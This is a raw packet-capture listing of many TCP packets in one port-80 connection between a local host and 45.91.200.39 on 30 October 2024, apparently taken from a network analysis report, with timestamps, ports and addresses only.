Oct 30, 2024 19:47:05.379877090 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379901886 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379916906 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379928112 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379939079 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.379955053 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.379987955 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380294085 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380305052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380316019 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380340099 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380356073 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380356073 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380368948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380393028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380433083 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380582094 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380625010 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380630016 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380640984 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380671978 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380846977 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380858898 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380884886 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.380959034 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380970955 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380981922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.380992889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.381007910 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.381026983 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.381042957 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.639858961 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.639934063 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.639971972 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640007973 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640011072 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640043020 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640043020 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640067101 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640089035 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640095949 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640129089 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640134096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640162945 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640168905 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640198946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640202999 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640233994 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640238047 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640269041 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640271902 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640307903 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640311003 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640342951 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640345097 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640377045 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640386105 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640410900 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640413046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640448093 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640451908 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640482903 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640491962 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640522957 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640522957 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640566111 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640639067 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640672922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640680075 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640707016 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640712023 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640741110 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640747070 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640774965 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640777111 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640810013 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640814066 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640845060 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640846014 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640882969 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640887976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640918970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640925884 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640953064 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640955925 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.640988111 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.640990019 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641022921 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641026974 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641058922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641058922 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641094923 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641096115 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641135931 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641225100 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641258001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641268015 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641292095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641295910 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641321898 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641330004 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641357899 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641362906 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641392946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641396999 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641426086 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641431093 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641460896 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641468048 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641494989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641499043 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641530037 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641530991 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641565084 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641568899 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641602039 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641602039 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641634941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641752958 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641787052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641824007 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641856909 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641891956 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641927958 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641928911 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641963005 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.641973972 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.641995907 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.642004967 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.642030001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.642034054 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.642069101 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646174908 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646228075 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646231890 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646264076 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646271944 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646298885 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646301031 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646334887 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646336079 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646368980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646372080 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646408081 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646423101 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646451950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646464109 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646486044 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646487951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646521091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646522999 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646560907 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646573067 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646609068 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646610022 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646641970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646645069 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646678925 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646678925 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646713018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646718025 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646748066 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646749973 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646786928 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646917105 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.646965981 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.646970034 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647006035 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647011995 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647044897 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647059917 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647094011 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647111893 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647129059 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647131920 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647165060 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647166014 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647203922 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647227049 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647259951 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647264957 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647294998 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647300005 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647334099 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647588968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647630930 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647633076 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647644043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647670031 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647691965 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647758007 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647768974 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647780895 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647794962 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647806883 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647831917 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647893906 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647905111 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647913933 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.647933006 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.647947073 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.702517033 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.702542067 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.702552080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.702595949 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.702631950 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.703361988 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.703423977 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.703722954 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.703771114 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730184078 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730252028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730262041 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730273008 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730302095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730330944 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730350971 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730360985 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730391026 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730492115 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730531931 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730540991 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730541945 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730575085 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730590105 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730623007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730812073 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730820894 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730827093 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.730885983 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730912924 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.730999947 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731009960 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731040001 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731054068 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731102943 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731112957 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731122971 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731162071 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731162071 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731261015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731271029 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731283903 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731296062 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731322050 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731342077 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731379032 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731553078 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731585026 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731594086 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731597900 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731626034 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731652021 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731713057 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731724024 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731734037 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731746912 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.731753111 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731771946 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.731790066 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732319117 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732331038 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732342005 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732361078 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732378006 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732386112 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732569933 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732610941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732615948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732628107 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732650042 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732671976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732731104 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732742071 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732752085 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732765913 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732770920 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732785940 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732796907 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.732943058 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.732979059 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.733000994 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.733014107 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.733023882 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.733035088 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.733050108 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.733063936 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.819705009 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.819757938 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.819789886 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.819797993 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.819829941 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.819852114 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848088980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848138094 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848174095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848186970 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848208904 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848212004 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848222017 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848243952 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848248959 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848278999 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848290920 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848320961 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848321915 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848355055 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848365068 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848393917 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848411083 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848444939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848453999 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848479033 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848486900 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848526955 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848531008 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848566055 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848572016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848598957 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848602057 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848634005 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848637104 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848668098 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848673105 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848706007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848722935 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848758936 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848758936 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848795891 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848803043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848839998 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848845005 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848876953 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848900080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848934889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848942041 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.848969936 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.848974943 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:05.849004984 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:05.849008083 CET	49730	80	192.168.2.4	45.91.200.39
